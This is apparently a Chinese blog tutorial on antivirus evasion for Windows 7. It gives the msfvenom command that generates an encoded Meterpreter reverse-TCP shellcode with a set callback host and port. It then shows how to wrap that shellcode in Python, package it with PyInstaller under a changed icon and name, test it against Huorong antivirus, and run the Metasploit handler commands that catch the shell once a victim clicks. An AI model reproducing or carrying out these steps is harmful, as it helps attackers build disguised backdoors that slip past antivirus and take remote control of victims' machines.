Python 加密 shellcode 免杀

环境准备:

  Windows7 32 位系统;

Shellcode 使用 kali linux Metasploit 生成 shellcode

 

 

Windows7 需要安装的软件:

   Python2.7,  pip install pyinstaller

pywin32-217.win32-py2.7.exe 

VCForPython27.msi

 

 

 

制作流程: 

  1. 首先查看自己的kali  ip 作为shell反弹的服务器

Python 加密 shellcode 免杀

 2. Kalilinux 生成shellcode木马   msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=8888 LHOST=192.168.23.129 -e x86/shikata_ga_nai -i 11 -f py -o sylon.py

Python 加密 shellcode 免杀

 3. 把生成的 shellcode 替换如下 python shellcode:

 

4. 后门程序制作  进入python安装目录script 安装开头三个必要条件 将shellcodo更换个图标

Python 加密 shellcode 免杀

Python 加密 shellcode 免杀

 

也可以改名字哈  当然图标也可以随意该!!!

5. 拉出来 测测杀毒软件(这里火绒为例)

Python 加密 shellcode 免杀

Python 加密 shellcode 免杀

 

6.kali 监听  客户机配合点下 哈哈

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_uuid

set lhost 192.168.23.129

set lport 8888

set EnableStageEncoding true

set StageEncoder x86/fnstenv_mov

exploit Python 加密 shellcode 免杀

Python 加密 shellcode 免杀

相关文章:

  • 2021-12-05
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2023-04-02
  • 2022-01-04
  • 2022-02-06
  • 2022-12-23
猜你喜欢
  • 2023-04-11
  • 2021-12-04
  • 2021-04-03
  • 2021-06-02
  • 2022-12-23
  • 2021-10-28
相关资源
相似解决方案